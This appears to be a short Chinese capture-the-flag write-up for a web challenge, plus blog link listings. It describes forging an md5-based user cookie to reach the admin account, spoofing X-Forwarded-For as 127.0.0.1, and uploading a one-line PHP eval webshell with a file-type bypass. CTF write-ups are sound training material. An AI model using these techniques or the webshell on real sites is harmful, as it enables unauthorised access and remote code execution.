攻防世界Web-bug

打开链接

先注册一个账号

创建成功,会给一个UID=5

抓包的user值就是UID:用户名的md5加密的编码

点击Manage时要求admin用户

利用改包把user改成admin

1:admin的md5值为4b9987ccafacb8d8fc08d22bbca797ba

还要把url上的UID改为1

存在逻辑漏洞,成功越权

返回首页修改密码,之后以管理员的身份进去,点击manage

修改成功,重新登录

再点击Manage

显示ip不对,那就进行ip伪造

添加数据X-Forwarded-For:127.0.0.1

还是找不到flag

查看源代码

&do=???这部分表示有一个动作需要执行,但是具体的操作(???)没有给出,

试一下发现是upload

最后构造/index.php?module=filemanage&do=upload

不能直接上传一句话

需要绕过

<script language="php">@eval($ POST['11'])</script>

上传之后修改一下文件类型

相关推荐
Chengbei116 小时前
面向红队的 AI 赋能全场景流量分析仪 网页 / APP / 终端 / IoT 全域 HTTPS 抓包解密利器
人工智能·物联网·网络协议·web安全·网络安全·https·系统安全
网络安全许木7 小时前
自学渗透测试第29天(Linux SUID/SGID基础实验)
linux·运维·服务器·web安全·渗透测试
YaBingSec7 小时前
玄机网络安全靶场:Apache HTTPD 解析漏洞(CVE-2017-15715)WP
java·笔记·安全·web安全·php·apache
weixin_514253188 小时前
425-aguvis tmux
web安全
weixin_5142531821 小时前
428-uitars tmux
安全·web安全
介一安全1 天前
【Web安全】Blind XSS漏洞:从挖掘到防御
安全·web安全·xss
YaBingSec1 天前
玄机网络安全靶场:Jackson-databind 反序列化漏洞(CVE-2017-7525)
linux·网络·笔记·安全·web安全
TechWayfarer1 天前
网络安全溯源实战:78.1%网络攻击来自境外,如何精准定位攻击源
网络·安全·web安全
视觉&物联智能1 天前
【杂谈】-人工智能于现代网络安全运营的价值持续攀升
人工智能·安全·web安全·ai·chatgpt·agi·deepseek
IpdataCloud1 天前
远程办公网络安全中,IP查询工具如何保障数据安全?适用场景与落地指南
tcp/ip·web安全·php